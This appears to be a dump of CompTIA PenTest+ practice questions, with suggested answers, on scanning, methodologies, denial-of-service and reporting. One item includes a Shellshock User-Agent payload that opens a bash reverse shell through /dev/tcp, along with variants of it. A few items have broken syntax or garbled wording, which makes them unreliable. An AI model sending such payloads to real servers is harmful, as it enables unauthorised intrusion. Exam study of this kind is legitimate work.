CompTIA PT0-002 Practice Test - Questions Answers, Page 11

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

Pre-engagement interaction (scoping and ROE)

Intelligence gathering (reconnaissance)

Threat modeling

Vulnerability analysis

Exploitation and post exploitation

Reporting

Which of the following methodologies does the client use?

A. OWASP Web Security Testing Guide
B. PTES technical guidelines
C. NIST SP 800-115
D. OSSTMM
Suggested answer: B

Explanation:

Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap -O -A -sS -p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.
Suggested answer: A

Explanation:

Reference: https://phoenixnap.com/kb/nmap-scan-open-ports

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

A. ROE
B. SLA
C. MSA
D. NDA
Suggested answer: D

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

A. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
D. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
Suggested answer: C

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

A. Smurf
B. Ping flood
C. Fraggle
D. Ping of death
Suggested answer: C

Explanation:

A Fraggle attack is the same as a Smurf attack but uses UDP rather than ICMP, so it remains possible on a segment where ICMP is disabled. Prevention of the two attacks is almost identical.

Reference: https://www.okta.com/identity-101/fraggle-attack/

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A. A quick description of the vulnerability and a high-level control to fix it
B. Information regarding the business impact if compromised
C. The executive summary and information regarding the testing company
D. The rules of engagement from the assessment
Suggested answer: A

Explanation:

The systems administrator and the technical staff would be more interested in the technical aspects of the findings.

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept":"text/html,application/xhtml+xml,application/xml"}
B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept":"text/html,application/xhtml+xml,application/xml"}
C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept":"text/html,application/xhtml+xml,application/xml"}
Suggested answer: A

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

A. NIST SP 800-53
B. OWASP Top 10
C. MITRE ATT&CK framework
D. PTES technical guidelines
Suggested answer: C

Explanation:

Reference: https://digitalguardian.com/blog/what-mitre-attck-framework

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

A. HTTPS communication
B. Public and private keys
C. Password encryption
D. Sessions and cookies
Suggested answer: D

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Suggested answer: C

Explanation:

Reference: https://phoenixnap.com/blog/best-penetration-testing-tools
